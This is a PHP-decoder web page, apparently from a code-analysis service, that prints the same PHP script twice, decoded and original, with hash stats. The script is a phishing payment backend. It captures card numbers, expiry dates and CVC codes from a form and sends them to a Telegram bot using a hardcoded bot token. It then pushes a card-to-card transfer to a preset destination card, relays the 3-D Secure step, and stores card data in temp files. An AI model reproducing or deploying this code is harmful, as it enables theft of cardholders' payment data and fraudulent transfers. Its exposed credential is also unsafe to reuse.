Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php include "config.php"; date_default_timezone_set("Europe/Moscow"); ..
Decoded Output download
<?php
include "config.php";
date_default_timezone_set("Europe/Moscow");
$date = date("d-m-Y H:i");
$message = "<b> * [colosseum.city]</b>
1. : ".$_POST["cardFrom"]."
2. : ".$_POST["cardFromMonth"]." / ".$_POST["cardFromYear"]."
3. CVC: ".$_POST["cardFromCVC"]."
4. : ".$_POST["amount"]."
5. : ".$_POST["description"]."
6. : ".$date."
7. : ".$_POST["comment"]."";
sendTel($message);
function sendTel($message){
$id = "-297550876"; // id
$tokken = "816631853:AAE_COo0uW3IkNMYqBDetpRDsTvDYpLZCno"; //
$filename = "https://api.telegram.org/bot".$tokken."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
file_get_contents($filename);
}
$message2 = "<b>[colosseum.city]</b>
1. : ".$_POST["amount"]."
2. : ".$_POST["description"]."
3. : ".$date."" ;
sendTel2($message2);
function sendTel2($message2){
$id1 = "-297550876"; // id
$tokken1 = "816631853:AAE_COo0uW3IkNMYqBDetpRDsTvDYpLZCno"; //
$filename = "https://api.telegram.org/bot".$tokken1."/sendMessage?chat_id=".$id1."&text=".urlencode($message2)."&parse_mode=html";
file_get_contents($filename);
}
error_reporting(E_ERROR | E_PARSE);
if (!$_SERVER["HTTP_REFERER"])
die('$_SERVER["HTTP_REFERER"] not found');
if (!isset($_POST["cardFrom"]) || !isset($_POST["cardFromMonth"]) || !isset($_POST["cardFromYear"]) || !isset($_POST["cardFromCVC"]))
die("cardFrom data not found");
else if (!isset($_POST["amount"]))
die("amount data not found");
else if (!isset($dest_card) || $dest_card == "")
die("destination card not set");
else {
$formData["amount"]["value"] = (int)$_POST["amount"];
$formData["amount"]["currency"] = "RUR";
$formData["source_card"]["number"] = $_POST["cardFrom"];
$formData["source_card"]["expiry_date"]["year"] = (int)("20" . $_POST["cardFromYear"]);
$formData["source_card"]["expiry_date"]["month"] = (int)$_POST["cardFromMonth"];
$formData["source_card"]["cvc2"] = $_POST["cardFromCVC"];
$formData["destination_card"]["number"] = $dest_card;
$ch = curl_init("https://p2p.mdm.ru/api/v2/requests");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($formData));
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$json = json_decode(curl_exec($ch), true);
curl_close($ch);
if ($json["state"] == "tds"){
$tempdata["access_token"] = $json["access_token"];
$tempdata["request_id"] = $json["request_id"];
$tempdata["amount"] = $_POST["amount"];
$tempdata["card"] = $_POST["cardFrom"];
$tempdata["cardCVC"] = $_POST["cardFromCVC"];
$tempdata["comment"] = $_POST["comment"];
$tempdata["cardExpired"] = $_POST["cardFromMonth"] . "/" . $_POST["cardFromYear"];
file_put_contents("temp/" . $json["tds_data"]["md"], json_encode($tempdata, true));
echo '<html><head>' .
'<script src="https://code.jquery.com/jquery-3.3.1.js"></script>' .
'<script>$(document).ready(function(){$("#payform").submit();});</script>' .
'</head><body style="padding: 0px; margin: 0px;">' .
'<form action="' . $json["tds_data"]["acs_url"] . '" method="post" target="payframe" id="payform">' .
'<input type="hidden" name="PaReq" value="' . $json["tds_data"]["pa_req"] . '">' .
'<input type="hidden" name="MD" value="' . $json["tds_data"]["md"] . '">' .
'<input type="hidden" name="TermUrl" value="https://' . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . '/paystatus.php">' .
'</form>' .
'<iframe name="payframe" style="width: 100%; height: 100%; border: 0px;"></iframe>' .
'</body></html>';
} else {
if (isset($json["description"]))
echo " : " . $json["description"];
else
echo " ";
}
}
?>Did this file decode correctly?
Original Code
<?php
include "config.php";
date_default_timezone_set("Europe/Moscow");
$date = date("d-m-Y H:i");
$message = "<b> * [colosseum.city]</b> \n 1. : ".$_POST["cardFrom"]." \n 2. : ".$_POST["cardFromMonth"]." / ".$_POST["cardFromYear"]."\n 3. CVC: ".$_POST["cardFromCVC"]." \n 4. : ".$_POST["amount"]." \n 5. : ".$_POST["description"]." \n 6. : ".$date." \n 7. : ".$_POST["comment"]."";
sendTel($message);
function sendTel($message){
$id = "-297550876"; // id
$tokken = "816631853:AAE_COo0uW3IkNMYqBDetpRDsTvDYpLZCno"; //
$filename = "https://api.telegram.org/bot".$tokken."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
file_get_contents($filename);
}
$message2 = "<b>[colosseum.city]</b> \n 1. : ".$_POST["amount"]." \n 2. : ".$_POST["description"]." \n 3. : ".$date."" ;
sendTel2($message2);
function sendTel2($message2){
$id1 = "-297550876"; // id
$tokken1 = "816631853:AAE_COo0uW3IkNMYqBDetpRDsTvDYpLZCno"; //
$filename = "https://api.telegram.org/bot".$tokken1."/sendMessage?chat_id=".$id1."&text=".urlencode($message2)."&parse_mode=html";
file_get_contents($filename);
}
error_reporting(E_ERROR | E_PARSE);
if (!$_SERVER["HTTP_REFERER"])
die('$_SERVER["HTTP_REFERER"] not found');
if (!isset($_POST["cardFrom"]) || !isset($_POST["cardFromMonth"]) || !isset($_POST["cardFromYear"]) || !isset($_POST["cardFromCVC"]))
die("cardFrom data not found");
else if (!isset($_POST["amount"]))
die("amount data not found");
else if (!isset($dest_card) || $dest_card == "")
die("destination card not set");
else {
$formData["amount"]["value"] = (int)$_POST["amount"];
$formData["amount"]["currency"] = "RUR";
$formData["source_card"]["number"] = $_POST["cardFrom"];
$formData["source_card"]["expiry_date"]["year"] = (int)("20" . $_POST["cardFromYear"]);
$formData["source_card"]["expiry_date"]["month"] = (int)$_POST["cardFromMonth"];
$formData["source_card"]["cvc2"] = $_POST["cardFromCVC"];
$formData["destination_card"]["number"] = $dest_card;
$ch = curl_init("https://p2p.mdm.ru/api/v2/requests");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($formData));
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$json = json_decode(curl_exec($ch), true);
curl_close($ch);
if ($json["state"] == "tds"){
$tempdata["access_token"] = $json["access_token"];
$tempdata["request_id"] = $json["request_id"];
$tempdata["amount"] = $_POST["amount"];
$tempdata["card"] = $_POST["cardFrom"];
$tempdata["cardCVC"] = $_POST["cardFromCVC"];
$tempdata["comment"] = $_POST["comment"];
$tempdata["cardExpired"] = $_POST["cardFromMonth"] . "/" . $_POST["cardFromYear"];
file_put_contents("temp/" . $json["tds_data"]["md"], json_encode($tempdata, true));
echo '<html><head>' .
'<script src="https://code.jquery.com/jquery-3.3.1.js"></script>' .
'<script>$(document).ready(function(){$("#payform").submit();});</script>' .
'</head><body style="padding: 0px; margin: 0px;">' .
'<form action="' . $json["tds_data"]["acs_url"] . '" method="post" target="payframe" id="payform">' .
'<input type="hidden" name="PaReq" value="' . $json["tds_data"]["pa_req"] . '">' .
'<input type="hidden" name="MD" value="' . $json["tds_data"]["md"] . '">' .
'<input type="hidden" name="TermUrl" value="https://' . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . '/paystatus.php">' .
'</form>' .
'<iframe name="payframe" style="width: 100%; height: 100%; border: 0px;"></iframe>' .
'</body></html>';
} else {
if (isset($json["description"]))
echo " : " . $json["description"];
else
echo " ";
}
}
?>Function Calls
| None |
Stats
| MD5 | cec9196c296985b16e63d5bcb2163e6f |
| Eval Count | 0 |
| Decode Time | 107 ms |